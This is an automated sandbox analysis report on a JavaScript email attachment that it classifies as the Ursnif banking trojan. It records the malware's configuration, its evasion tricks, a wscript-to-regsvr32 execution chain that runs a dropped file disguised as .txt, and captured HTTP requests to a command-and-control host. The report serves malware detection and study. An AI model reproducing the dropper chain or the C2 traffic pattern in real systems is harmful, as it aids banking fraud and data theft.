Loading ...

Play interactive tourEdit tour

Analysis Report view_attach_i1j.js

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:228101
Start date:06.05.2020
Start time:22:44:30
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:view_attach_i1j.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Without Instrumentation
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal92.bank.troj.evad.winJS@10/3@2/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 5.6% (good quality ratio 5.2%)
  • Quality average: 78%
  • Quality standard deviation: 28.5%
HCA Information:
  • Successful, ratio: 66%
  • Number of executed functions: 48
  • Number of non-executed functions: 59
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 93.184.221.240, 23.61.218.119
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, e11290.dspg.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, go.microsoft.com.edgekey.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold920 - 100false
Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation2Winlogon Helper DLLProcess Injection12Masquerading11Credential DumpingSystem Time Discovery1Remote File Copy3Data from Local SystemData Encrypted1Standard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScripting2Port MonitorsAccessibility FeaturesProcess Injection12Network SniffingProcess Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExecution through API13Accessibility FeaturesPath InterceptionScripting2Input CaptureAccount Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExploitation for Client Execution1System FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesSystem Owner/User Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessDLL Side-Loading1Account ManipulationSecurity Software Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceDLL Search Order HijackingBrute ForceFile and Directory Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskSoftware PackingTwo-Factor Authentication InterceptionSystem Information Discovery34Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: regsvr32.exe.4512.4.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "337", "system": "e8a5b28f2e21add3528954a373c9ff9ahh!", "size": "200776", "crc": "2", "action": "00000000", "id": "2000", "time": "1588830398", "user": "31b341dd54c8a3b79c4b2eb545ab75a4", "hash": "0x7d10c6e1", "soft": "3"}

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DA7EE6 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_02DA7EE6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE6C38E FindFirstFileExA,4_2_6EE6C38E

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /api1/WdKuVYoasB88JK_2FtDw/B63tIrb_2BPnzWpbDhM/rXAfCU2MEwh_2FPKKbrp7W/70vCTyr3ieZmP/Aol0rorW/GJTbkhfvuzTBgE3CVgeIDbb/TiWjJqN0Mk/QTAO9ICqeQB9ZNH85/skQEio7KvkSE/KXxE4ne_2Fm/S_2BN4AEsl796t/1DnjGyXPBUrEl49fw15xp/lJWGqem2Cibf8NoN/rXTvyhjzsWVobld/I5M34V0A6YD5sTODt1/3H7XvZKpf/u40faZz5KRogy6_0A_0D/2Jr3mApOs18XiaZ171T/6NhWBkC21cP2CAgdhU1ltm/l8H5Ag HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: fs.ramtool.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: fs.ramtool.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/MT37giYB2/ETUHnK6p_2FxAqeo_2BP/SQCgSOI4voBI8I_2FEh/upEgwRFkJrom24MXZFGmOr/kUcDio50NRTme/eRK7DE_2/B3LrxnqljZFMT3mjkf7lfcz/Qa9s1EO1gs/q8qGzvYiAs2BrwNGF/_2BKdUYjnO7B/vIbjjlh_2BV/Yu1IBmvjReGSfM/HHntovtG0gsFru9j3aB4z/I0ImysbMU14KNz16/YYgA1NWr9Yusv1p/L_2BXswOA9Y8ZxqogX/0AK9I4ewD/Xm4ss81cN_0A_0D3ZIe5/m0b_2BSs7yv0FXHs8aQ/D14lauOZdxPRz_2FBpk1Fo/OMBd1SzkUXbT7/shpvP5GVW2/qYY HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: fs.ramtool.atConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: fs.ramtool.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 May 2020 20:46:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1128248157.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127990612.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1157819939.00000000055FB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128423151.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127823984.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128531702.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128488327.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128128667.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128341162.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4512, type: MEMORY

E-Banking Fraud:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1128248157.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127990612.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1157819939.00000000055FB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128423151.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127823984.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128531702.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128488327.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128128667.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128341162.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4512, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Abnormal high CPU UsageShow sources
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE51652 NtMapViewOfSection,4_2_6EE51652
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE5113E GetProcAddress,NtCreateSection,memset,4_2_6EE5113E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE52765 NtQueryVirtualMemory,4_2_6EE52765
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DA1EAA NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_02DA1EAA
Detected potential crypto functionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE525444_2_6EE52544
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DAAA844_2_02DAAA84
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DA172E4_2_02DA172E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE61C804_2_6EE61C80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE66D104_2_6EE66D10
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: view_attach_i1j.jsInitial sample: Strings found which are bigger than 50
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal92.bank.troj.evad.winJS@10/3@2/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\njtgDDroR.txtJump to behavior
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_i1j.js'
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2680 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2680 CREDAT:82950 /prefetch:2
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txtJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txtJump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2680 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2680 CREDAT:82950 /prefetch:2Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Submission file is bigger than most known malware samplesShow sources
Source: view_attach_i1j.jsStatic file information: File size 3134701 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\night\beat\flow\Catch\Range\Solve\BuildGood.pdb source: regsvr32.exe, 00000004.00000002.1226810675.000000006EE7C000.00000002.00020000.sdmp, njtgDDroR.txt.0.dr

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE524E0 push ecx; ret 4_2_6EE524E9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE52533 push ecx; ret 4_2_6EE52543
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DAAA73 push ecx; ret 4_2_02DAAA83
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DAA740 push ecx; ret 4_2_02DAA749
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE6B6D6 push esp; retf 4_2_6EE6B6D7
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE6DABB push dword ptr [esp+ecx-75h]; iretd 4_2_6EE6DABF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE6B0D3 push esp; retf 4_2_6EE6B0E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE75832 push C7898BFFh; iretd 4_2_6EE75837
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE7517D push eax; ret 4_2_6EE75187

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\njtgDDroR.txtJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\njtgDDroR.txtJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1128248157.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127990612.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1157819939.00000000055FB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128423151.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127823984.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128531702.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128488327.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128128667.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128341162.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4512, type: MEMORY
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found evasive API chain (date check)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found evasive API chain checking for process token informationShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DA7EE6 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_02DA7EE6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE6C38E FindFirstFileExA,4_2_6EE6C38E
Program exit pointsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end node

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE51C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,4_2_6EE51C57
Contains functionality to read the PEBShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE62D32 mov eax, dword ptr fs:[00000030h]4_2_6EE62D32
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE9B849 mov eax, dword ptr fs:[00000030h]4_2_6EE9B849
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE9B389 push dword ptr fs:[00000030h]4_2_6EE9B389
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE9B77F mov eax, dword ptr fs:[00000030h]4_2_6EE9B77F
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE6CFDB GetProcessHeap,4_2_6EE6CFDB
Contains functionality to register its own exception handlerShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE5223F InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,4_2_6EE5223F

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: njtgDDroR.txt.0.drJump to dropped file
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txtJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: regsvr32.exe, 00000003.00000002.1223273536.0000000000BE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1224369222.0000000003580000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.1223273536.0000000000BE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1224369222.0000000003580000.00000002.00000001.sdmpBinary or memory string: Progman
Source: regsvr32.exe, 00000003.00000002.1223273536.0000000000BE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1224369222.0000000003580000.00000002.00000001.sdmpBinary or memory string: hProgram ManagerWE
Source: regsvr32.exe, 00000003.00000002.1223273536.0000000000BE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1224369222.0000000003580000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,4_2_6EE510EC
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,4_2_6EE676DA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,4_2_6EE70654
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6EE70721
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,LdrInitializeThunk,4_2_6EE67335
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,4_2_6EE700AC
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,4_2_6EE70061
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,4_2_6EE70424
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,4_2_6EE70422
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_6EE6FDE9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,4_2_6EE70147
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6EE7054D
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DA39DF cpuid 4_2_02DA39DF
Queries the installation date of WindowsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE51C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,4_2_6EE51C57
Contains functionality to query the account / user nameShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02DA39DF GetUserNameW,GetUserNameW,HeapFree,HeapFree,4_2_02DA39DF
Contains functionality to query windows versionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_6EE517E2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,4_2_6EE517E2
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1128248157.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127990612.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1157819939.00000000055FB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128423151.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1127823984.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128531702.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128488327.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128128667.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1128341162.0000000005778000.00000004.00000040.sdmp, type: MEMORY
